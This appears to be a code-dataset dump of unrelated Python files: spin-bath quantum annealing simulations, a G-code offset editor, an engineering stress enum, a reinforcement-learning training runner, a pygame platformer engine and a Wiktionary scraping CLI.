np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_3(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[-omega/Nb**2,0,0]]
SB_list = [[-gamma/Nb,i,0] for i in range(L)]
B_h_list = [[-1,0]]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = []
dynamic = [
["x|",h_list,B,()],
["|+",B_h_list,B,()],
["|-",B_h_list,B,()],
["zz|",J_list,A,()],
["z|z",SB_list,A,()],
["|zz",bath_energy,A,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_4(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[-omega/Nb,0,0]]
SB_1_list = [[-gamma/Nb,i,0] for i in range(L)]
SB_2_list = [[-gamma/np.sqrt(Nb),i,0] for i in range(L)]
B_h_list = [[-1,0]]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["+|-",SB_2_list],
["-|+",SB_2_list],
]
dynamic = [
["x|",h_list,B,()],
["|+",B_h_list,B,()],
["|-",B_h_list,B,()],
["zz|",J_list,A,()],
["z|z",SB_1_list,A,()],
["|zz",bath_energy,A,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_5(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[omega/Nb,0]]
SB_xy_list = [[gamma/(4.0*Nb),i,0] for i in range(L)]
SB_zz_list = [[gamma/(2.0*Nb),i,0] for i in range(L)]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["|z",bath_energy],
]
dynamic = [["zz|",J_list,A,()],
["x|",h_list,B,()],
["+|-",SB_xy_list,B,()],
["-|+",SB_xy_list,B,()],
["z|z",SB_zz_list,B,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
L = int(sys.argv[1])
Nb = int(sys.argv[2])
T = float(sys.argv[3])
gamma = float(sys.argv[4])
omega = float(sys.argv[5])
model = int(sys.argv[6])
path = sys.argv[7]
if model == 1:
anneal_bath_1(L,Nb,T,gamma,omega,path)
elif model == 2:
anneal_bath_2(L,Nb,T,gamma,omega,path)
elif model == 3:
anneal_bath_3(L,Nb,T,gamma,omega,path)
elif model == 4:
anneal_bath_4(L,Nb,T,gamma,omega,path)
elif model == 5:
anneal_bath_5(L,Nb,T,gamma,omega,path)
| StarcoderdataPython |
5132964 | #!/usr/bin/env python3
import fileinput
import re
import sys
"Usage gcode_edit.py gcodeprogram.gcode axis offset -- gcode_edit.py program.gcode X -25"
with fileinput.FileInput(sys.argv[1], inplace=True, backup='.bak') as file:
for line in file:
elements = re.split(' ', line)
for i in range(len(elements)):
if (elements[i].find(str(sys.argv[2])) != -1):
axis_integer=round(float((elements[i])[1:])-float(sys.argv[3])),4)
"This assumes that your orgin is the lower left of the table. If it is the center of the table comment out these two lines."
if (axis_integer < 0):
axis_integer=0
elements[i]=(str(sys.argv[2])+str(axis_integer))
fixed_line = ' '.join(elements)
print(fixed_line, end='')
| StarcoderdataPython |
1897273 | # Generated with StressType
#
from enum import Enum
from enum import auto
class StressType(Enum):
""""""
AXIAL_BENDING = auto()
TRUE_WALL = auto()
AXIAL_STRESS = auto()
VON_MISES = auto()
def label(self):
if self == StressType.AXIAL_BENDING:
return "Axial bending stress"
if self == StressType.TRUE_WALL:
return "True wall axial stress"
if self == StressType.AXIAL_STRESS:
return "Resultant axial stress"
if self == StressType.VON_MISES:
return "Von mises stress" | StarcoderdataPython |
4908376 | <reponame>roiyeho/drl-book
import numpy as np
import matplotlib.pyplot as plt
import time
import os
import gym
class EnvRunner:
def __init__(self,
env,
agent,
n_episodes=1000,
test_env=None,
test_episode_max_len=10000,
check_solved=True,
win_trials=100,
win_mean_reward=195,
stats_interval=100,
):
"""
:param env: an instance of gym environment
:param agent: the agent instance
:param n_episodes: number of episodes used for training
:param test_env: the environment used for testing. If None, use the same
environment used for training.
:param test_episode_max_len: maximum number of steps used for evaluation
:param check_solved: whether to check if the environment was solved
:param win_trials: number of consecutive trials considered for
checking if the environment was solved
:param win_mean_reward: mean of rewards that needs to be achieved
for the environment to be considered solved
:param stats_interval: how frequently to compute statistics
"""
self.env = env
self.agent = agent
self.n_episodes = n_episodes
self.test_env = env if test_env is None else test_env
self.test_episode_max_len = test_episode_max_len
self.check_solved = check_solved
self.win_trials = win_trials
self.win_mean_reward = win_mean_reward
self.stats_interval = stats_interval
self.create_results_folder()
def create_results_folder(self, **kwargs):
params_str = ''
for key, value in kwargs.items():
params_str += f'-{key}{value}'
time_str = time.strftime("%Y%m%d-%H%M%S")
self.results_folder = os.path.join('results', f'{self.env.spec.id}-{time_str}{params_str}')
os.makedirs(self.results_folder)
# Create the results file
filename = os.path.join(self.results_folder, 'results.txt')
self.results_file = open(filename, 'w')
print('#Episode Reward', file=self.results_file)
def run(self):
total_rewards = [] # stores the total reward per episode
start_time = time.time()
total_steps = 0
for episode in range(self.n_episodes):
done = False
total_reward = 0
step = 0 # counts the time steps in this episode
states, actions, rewards = [], [], []
state = self.env.reset()
# Run an episode
while not done:
action = self.agent.select_action(state)
next_state, reward, done, info = self.env.step(action)
states.append(state)
actions.append(action)
rewards.append(reward)
state = next_state
total_reward += reward
step += 1
total_steps += 1
# Train the agent at the end of the episode
self.agent.train(states, actions, rewards)
# Store the total reward
total_rewards.append(total_reward)
print(f'Episode: {episode + 1}, steps: {step}, reward: {total_reward}')
self.save_result(episode, total_reward)
# Check if the environment was solved
if self.check_solved and self.is_env_solved(episode, total_rewards, total_steps, start_time):
break
# Compute the mean total reward in the last 100 episodes
if (episode + 1) % self.stats_interval == 0:
self.compute_stats(episode, total_rewards, total_steps, start_time)
self.end_experiment(total_rewards)
def is_env_solved(self, episode, total_rewards, total_steps, start_time):
mean_reward = np.mean(total_rewards[-self.win_trials:])
if mean_reward >= self.win_mean_reward and \
episode >= self.win_trials:
elapsed_time = int(time.time() - start_time)
print('=' * 95)
print(f'Solved in episode {episode}, '
f'mean reward: {mean_reward}, '
f'total steps: {total_steps}, '
f'elapsed time: {elapsed_time} sec')
self.evaluate_agent(episode)
print('=' * 95)
return True
return False
def compute_stats(self, episode, total_rewards, total_steps, start_time):
mean_reward = np.mean(total_rewards[-self.win_trials:])
elapsed_time = int(time.time() - start_time)
print('=' * 85)
print(f'Episode {episode + 1}: mean reward = {mean_reward}, '
f'total steps = {total_steps}, elapsed time = {elapsed_time} sec')
self.evaluate_agent(episode)
print('=' * 85)
self.agent.save_model(self.results_folder, self.env.spec.id)
def end_experiment(self, total_rewards):
self.results_file.close()
self.agent.save_model(self.results_folder, self.env.spec.id)
self.plot_rewards(total_rewards)
def save_result(self, episode, reward):
print(episode + 1, reward, file=self.results_file)
self.results_file.flush()
def plot_rewards(self, rewards):
x = range(0, len(rewards))
plt.plot(x, rewards)
plt.xlabel('Episode', fontsize=12)
plt.ylabel('Total reward', fontsize=12)
plt.title('Learning curve', fontsize=14)
graph_file = os.path.join(self.results_folder, f'{self.env.spec.id}.png')
plt.savefig(graph_file)
def plot_results_from_file(self, file_path):
rewards = np.loadtxt(file_path)
self.plot_rewards(rewards)
def evaluate_agent(self, episode):
# Add a Monitor wrapper for recording a video
video_folder = os.path.join(self.results_folder, f'videos/e{episode + 1}')
env = gym.wrappers.Monitor(self.test_env, video_folder)
done = False
total_reward = 0
step = 0
state = env.reset()
# Run an episode on the wrapped environment with exploration turned off
while not done and step < self.test_episode_max_len:
action = self.agent.select_action(state)
next_state, reward, done, _ = env.step(action)
state = next_state
step += 1
total_reward += reward
print(f'Agent evaluation: steps = {step}, reward = {total_reward}') | StarcoderdataPython |
6516322 | import json
import random
import pygame
import os
from adventure import sound
from adventure import clock
from adventure import camera
from adventure import texture
from adventure import character
from bintrees import rbtree
FULL_SCREEN_FLAG = pygame.FULLSCREEN | pygame.HWSURFACE | pygame.DOUBLEBUF;
BGCOLOR = (20, 20, 20)
GRAVITY = 800
class Adventure:
initialized = False
ready = False
window_width = 0;
window_height = 0;
canvas_width = 0;
canvas_height = 0;
screen = None
font = None
clock = None
level = None
canvas = None
ui = None
draw_ui = False
delay = 0;
done = False
scale = 1
camera = None
default_camera = None
debug_camera = None
world_col = 64
world_row = 64
block_size = 32
debug = False
world = None
blocks = None
texture = texture.Texture("res/texture")
start_point = None
sound_master = None
# tmp for test
# ------------------------------
dir = 0
background = []
camera_background = []
ch = None
def init(self, config_obj):
if not self.initialized:
if os.name == 'nt':
# is current os is windows fix dpi
import ctypes
ctypes.windll.user32.SetProcessDPIAware()
# window config
# ---------------------------------------------------------------------
window_config = config_obj["window"]
full_screen = window_config["fullScreen"]
window_width = window_config["width"] if full_screen else window_config["width"];
window_height = window_config["height"] if full_screen else window_config["height"];
window_flag = FULL_SCREEN_FLAG if full_screen else 0
# font config
# ---------------------------------------------------------------------
font_config = config_obj["font"]
font_family = font_config["family"]
font_size = font_config["size"]
# clock config
# ---------------------------------------------------------------------
max_fps = config_obj['fps']
self.clock = clock.GameClock(max_fps)
# ui
# ---------------------------------------------------------------------
self.ui = pygame.Surface((window_width, window_height))
# sound
self.sound_master = sound.SoundMaster()
# level
# ---------------------------------------------------------------------
self.level = config_obj['mainLevel']
# init pygame
pygame.init()
# init font module
pygame.font.init()
self.screen = pygame.display.set_mode((window_width, window_height), window_flag)
self.window_width, self.window_height = self.screen.get_size();
self.font = pygame.font.SysFont(font_family, font_size)
self.load_level(self.level)
self.initialized = True
self.dir = 4
def start(self):
self.clock.tick()
while not self.done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.done = True;
continue;
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_F8:
self.debug = not self.debug
if self.debug:
self.camera = self.debug_camera
self.camera.pos = self.default_camera.pos
self.camera.update_camera_rect()
else:
self.camera = self.default_camera
if event.key == pygame.K_r:
self.restart()
break
if event.type == pygame.MOUSEBUTTONDOWN:
if self.debug:
if event.button == 4 or event.button == 5:
delta = -0.01 if event.button == 4 else 0.01
self.debug_camera.set_scale(self.debug_camera.scale + delta)
self.screen.fill((0, 0, 0))
if not self.ready:
continue
vx = self.lerp(self.default_camera.pos['x'], self.ch.x, 10 * self.delay)
vy = self.lerp(self.default_camera.pos['y'], self.ch.y, 10 * self.delay)
self.default_camera.pos["x"] = vx
self.default_camera.pos["y"] = vy
self.default_camera.update_camera_rect()
self.draw_camera_background()
self.draw_blocks()
self.draw_background()
self.ch.handle(pygame.key.get_pressed())
self.ch.update(self.delay)
self.ch.draw(self.canvas)
self.sound_master.update(self.delay)
# ------ debug ------ #
if self.debug:
self.default_camera.draw_camera_gird(self.canvas)
px, py = self.debug_camera.get_mouse_hover_point();
pygame.draw.rect(self.canvas, (255, 0, 0),
(px * self.block_size, py * self.block_size, self.block_size, self.block_size), 2)
pygame.draw.rect(self.canvas, (0, 255, 0), self.default_camera.rect, 2)
self.camera.surface.blit(self.canvas.subsurface(self.camera.rect), (0, 0))
self.screen.blit(pygame.transform.smoothscale(self.camera.surface, (self.window_width, self.window_height)),
(self.camera.offset_x, self.camera.offset_y))
self.screen.blit(self.font.render(str(self.clock.get_fps()), True, (255, 0, 0)), (0, 0))
pygame.display.update()
if self.camera.offset_x > 0 or self.camera.offset_y > 0:
self.screen.fill((0, 0, 0))
pygame.draw.rect(self.canvas, BGCOLOR, self.default_camera.rect, 0)
self.delay = self.clock.tick()
def load_level(self, level):
level_file_name = "./level/" + level;
level_file = open(level_file_name, "r")
level_obj = json.load(level_file)
self.world_row = level_obj['worldRow']
self.world_col = level_obj['worldCol']
self.block_size = level_obj['blockSize']
self.scale = level_obj['scale']
self.canvas = pygame.Surface(((self.world_col * self.block_size) + 1, (self.world_row * self.block_size) + 1))
self.canvas_width, self.canvas_height = self.canvas.get_size()
self.default_camera = camera.Camera(self.scale,
(self.canvas_width, self.canvas_height),
(self.window_width, self.window_height),
(self.canvas_width, self.canvas_height), self.block_size)
self.debug_camera = camera.Camera(1,
(self.canvas_width / 2, self.canvas_height),
(self.window_width, self.window_height),
(self.canvas_width, self.canvas_height), self.block_size)
self.camera = self.default_camera
self.camera.update_camera_rect()
self.start_point = level_obj["start"]
self.ch = character.Character(self.start_point["x"], self.start_point["y"], 32, 32)
self.default_camera.pos['x'] = self.ch.x;
self.default_camera.pos['y'] = self.ch.y;
self.background = []
self.camera_background = []
self.world = rbtree.RBTree()
self.blocks = level_obj["blocks"]
index = 0
for block in self.blocks:
self.new_block(block, index)
index += 1
self.ready = True
for bg in level_obj["camera_background"]:
x = self.default_camera.rect.w * bg["x"]
y = self.default_camera.rect.h * bg["y"]
key = bg["key"]
self.camera_background.append((x, y, key))
def new_block(self, block, block_id):
x = block['x']
y = block['y']
w = block['w']
h = block['h']
for row in range(0, h):
for col in range(0, w):
pos_y = y + row
if pos_y not in self.world:
self.world.insert(pos_y, rbtree.RBTree())
row_tree = self.world[pos_y]
pos_x = x + col
row_tree.insert(pos_x, block_id)
if "gen" in block:
obj = block["gen"]
prob = 0 if "prob" not in block else block["prob"]
if random.randint(0, 100) < prob:
index = random.randint(0, len(obj) - 1)
self.background.append((pos_x + obj[index]["x"], pos_y + obj[index]["y"], obj[index]["key"]))
def get_block_id(self, x, y):
result = None
if y in self.world:
if x in self.world[y]:
result = self.world[y][x]
return result
def draw_blocks(self):
camera_block = pygame.Rect(self.default_camera.get_camere_block())
for block in self.blocks:
x = block['x']
y = block['y']
if 'drawAbove' in block:
y -= 1
w = block['w']
h = block['h']
init_x = x * self.block_size
init_y = y * self.block_size
t = self.texture.get_texture(block["name"])
if camera_block.colliderect((x, y, w, h)):
if block['draw'] == "fill":
self.canvas.blit(t, (init_x, init_y))
elif block['draw'] == "repeat":
offset_y = 0
while offset_y < h:
offset_x = 0
while offset_x < w:
if camera_block.collidepoint(x + offset_x, y + offset_y):
pos_x = init_x + offset_x * self.block_size
pos_y = init_y + offset_y * self.block_size
self.canvas.blit(t, (pos_x, pos_y))
offset_x += 1
offset_y += 1
def draw_background(self):
camera_block = pygame.Rect(self.default_camera.get_camere_block())
for shit in self.background:
x, y, key = shit
t = self.texture.get_texture(key)
if camera_block.collidepoint(x, y):
self.canvas.blit(t, (x * self.block_size, (y * self.block_size)))
def draw_camera_background(self):
for bg in self.camera_background:
x, y, key = bg
t = self.texture.get_texture(key)
self.canvas.blit(t, (self.default_camera.rect.x + x, self.default_camera.rect.y + y))
@staticmethod
def lerp(v1, v2, f):
return v1 + ((v2 - v1) * f)
def restart(self):
self.ch.x = self.start_point["x"]
self.ch.y = self.start_point["y"]
self.ch.vx = 0
self.ch.vy = 0
default = Adventure()
| StarcoderdataPython |
4867925 | <gh_stars>1-10
import click
import wiktionarifier.scrape.core as sc
import wiktionarifier.scrape.db as sdb
import wiktionarifier.format.core as fc
@click.group()
def top():
pass
@click.command(help="Scrape entries from wiktionary for use as training data.")
@click.option("--output-dir", default="data/scraped", help="directory for scraping output")
@click.option("--wiktionary-language", default="en", help="Language in which definitions are written on Wiktionary")
@click.option(
"--strategy",
default="random",
type=click.Choice(["inorder", "random"], case_sensitive=False),
help="Method for deciding which Wiktionary pages to visit. `inorder` visits all pages in lexicographic "
"order, while `random` will sample them randomly.",
)
@click.option("--max-pages", default=50000, help="Stop scraping after collecting this number of pages")
@click.option("--overwrite/--no-overwrite", default=False, help="If true, discard all previous scraping results")
def scrape(output_dir, wiktionary_language, strategy, max_pages, overwrite):
if not overwrite or (overwrite and click.confirm("Are you SURE you want to discard previous scraping results?")):
sc.scrape(output_dir, wiktionary_language, strategy, max_pages, overwrite)
@click.command(help="Turn scraped output into .conllu files")
@click.option("--input-dir", default="data/scraped", help="Directory containing scraping output")
@click.option("--output-dir", default="data/conllu", help="Directory conllu files will be written to")
@click.option(
"--write-individual-file/--no-write-individual-file",
default=False,
help="If true, make a separate .conllu file for each entry",
)
def format(input_dir, output_dir, write_individual_file):
if not sdb.db_exists(input_dir):
click.secho(f"No scraping database found at {input_dir}", fg="red")
fc.format(input_dir, output_dir)
top.add_command(scrape)
top.add_command(format)
if __name__ == "__main__":
top()
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.